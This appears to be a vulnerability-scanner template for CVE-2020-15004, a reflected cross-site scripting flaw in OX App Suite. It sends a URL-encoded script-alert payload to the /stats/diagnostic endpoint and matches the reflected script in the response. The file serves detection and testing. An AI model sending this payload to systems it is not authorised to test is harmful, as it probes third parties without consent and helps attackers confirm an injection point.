id: CVE-2020-15004
info:
  name: OX App Suite XSS
  risk: Medium
  author: '@GochaOqradze'
  
params:
  - root: '{{.BaseURL}}'

replicate:
  ports: '8009'

requests:
  - method: GET
    url: >-
     {{.root}}/stats/diagnostic?param=%3Cscript%3Ealert(%27ayb%27);%3C/script%3E%22
    detections:
      - >-
        RegexSearch("body", "<script>alert('ayb');</script>")
        
reference:
  - link: https://seclists.org/fulldisclosure/2020/Oct/20